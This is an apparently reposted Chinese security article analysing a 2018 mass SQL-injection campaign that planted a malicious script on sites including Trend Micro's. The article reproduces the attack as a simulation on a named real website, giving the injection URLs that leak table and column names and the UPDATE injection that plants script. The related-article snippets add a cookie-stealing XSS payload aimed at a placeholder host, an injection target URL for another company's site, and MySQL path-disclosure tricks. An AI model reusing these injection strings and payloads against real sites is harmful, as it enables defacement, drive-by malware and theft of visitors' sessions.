分析googl被黑，趋势科技页面插入js挂马等攻击报告

2018-02-14 14:42:24责编：llp 来源：驱动管家人气：

一. 首先在网上找到了这次攻击的新闻报道

http://www.nsfocus.net/news/6697

http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html

通过GOOGLE搜索到了相关被黑的页面

http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.comwww.2117966.net f**kjp.js&btnG=Google 鎼滅储&meta=&aq=f

趋势科技的页面被插入过http://www.2117966.net/f**kjp.js 相关的JS挂马。

二. 直接查找这个JS相关的信息

http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f

发现了12,500项符合的结果，这些返回的结果信息都是当前页面被插入了JS挂马。

通过分析发现被黑的页面都有如下特征：

1.被修改页面的网站都是ASP MSSQL的架构。

2.被修改的页面都存在SQL注入漏洞。

三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击：

1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162

这个链接存在明显的SQL注入,对person参数注入语句having 1=1,将暴出当前页面注入点的表名为coordinator，字段名ShCoordinatorSurame。

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1

—————————Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause./wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20—————————-

2. 修改暴出的当前页面的表名，字段名内容为插入JS的代码来实现挂马

http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1––

修改coordinator 表 ShCoordinatorSurame 字段内容为,同时设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容.

就可以实现在有SQL注入点的页面直接挂马。

四.总结.

这次大规模攻击的流程应该是自动化的：

1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。

2.针对漏洞攻击，进行自动化的SQL注入挂马。

现今虽然SQL注入漏洞已经很老了，但是这次黑客在一天内同时对数万网站攻击挂马的技术却是很惊人的，连趋势这样的安全公司也未能幸免。

管家婆软件的漏洞分析：该漏洞很容易被入侵
管家婆搞活动的页面，选漂亮的财务MM和帅蝈蝈，获奖的出国旅游呀！！！俺向二师兄保证绝对木有看MM的手机号。。。http: www grasp com cn talent TalentDetail aspx?c=bb7f3776-61e0-4733-9645-28927d7eebf8注射
详情2018-01-22 14:56:25责编：llp 来源：驱动管家
mysql教程 mysql注入怎么获取web路径？
我们在MYSQL注入的时候经常会碰到无法立即根据在注入点加单引号提交得到的返回信息来获得web目录,这个时候获得web路径就要费点劲了!针对这种情况,我介绍三种方法!load_file(char(47))查找部分*nix系统的目录。a
详情2018-01-18 09:38:36责编：llp 来源：驱动管家
通信协议有哪些？各通信协议的主要用途和特点
做过网络人都知道，要实现网络间的正常通信就必需选择合适的通信协议，否则轻则就会造成网络的接入速度太慢，工作不稳定，重则根本无法接通。今天我把我实际工作积累的此方面经验与大家分享，希望对还在迷茫中的
详情2018-01-20 14:28:53责编：llp 来源：驱动管家
校内网漏洞校内网存在xss漏洞
校内网在发blog时对插入图片过滤不严格，存在xss漏洞在发blog时将插入图片URL写为如下代码即可触发：普通浏览复制代码打印代码javascript：window location href=& 39;http: www xxx com test php?cookie=& 39;
详情2018-01-26 16:25:17责编：llp 来源：驱动管家
电脑怎么设置密码？这款大势至电脑文件加密软件能帮你
现在各种网络安全事件层出不穷，尤其是各种泄密“门”相关的安全事件让很多人胆战心惊。如何保护电脑文件安全、保护个人隐私，就成为当前文件防泄密的重要举措。如何选择合适的电脑文件加密软件呢？在此向大家推
详情2018-01-02 16:58:58责编：llp 来源：驱动管家
大部分被黑网站根源在于该网站有隐藏的后门脚本
你的网站为什么被黑了？经过网络安全公司Sucuri的安全专家的调查，有大约68%的被黑网站存在着隐藏的后门backdoor脚本。这些后门脚本就是为入侵者提供的秘密通道，即使管理员改变安全口令或更新了安全补丁，只要没
详情2018-01-19 14:07:30责编：llp 来源：驱动管家
315晚会曝光微信红包诈骗，同时提醒要提防wifi背后黑手
在昨天的 315 晚会中，央视通过调查、暗访为消费者揭露了有一批企业、服务坑害消费者的行为，而在这次的名单中，科技企业占据了约一半的席位。随着手机越来越成为人们日常生活中不可或缺的沟通工具，尤其带来的
详情2018-01-19 16:58:18责编：llp 来源：驱动管家
怎么解除tcp/ip筛选限制端口？只需导出注册表进行修改就行了
有时候服务器管理员会用TCP IP筛选限制端口，让我们无法登陆3389等等需要解除这一限制，只需要导出注册表进行修改就行了：TCP IP筛选在注册表里有三处，分别是：HKEY_LOCAL_MACHINE SYSTEM ControlSet001 Service
详情2018-02-06 14:52:36责编：llp 来源：驱动管家
黑客怎么入侵用户数据库的？怎么防御黑客入侵？
【事件回放】2012年6月6日晚上，知名专业社交网站LinkedIn爆出部分用户账户密码失窃，LinkedIn主管文森特·希尔维拉（Vicente Silveira）在其个人博客中证实了此事。根据Venturebeat的报道，650w被偷窃的LinkedI
详情2018-02-04 17:30:57责编：llp 来源：驱动管家
黑客入门黑客攻击网站的常用策略
这篇文章主要介绍了黑客攻击网站的常用策略，你必须掌握！,需要的朋友可以参考下【1】虚假无线接入（WAP）策略虚假WAP比其他任何技术都更容易完成攻击。任何人，简单用一种软件或无线网卡，就能将自己的电脑渲染
详情2018-01-20 14:46:56责编：llp 来源：驱动管家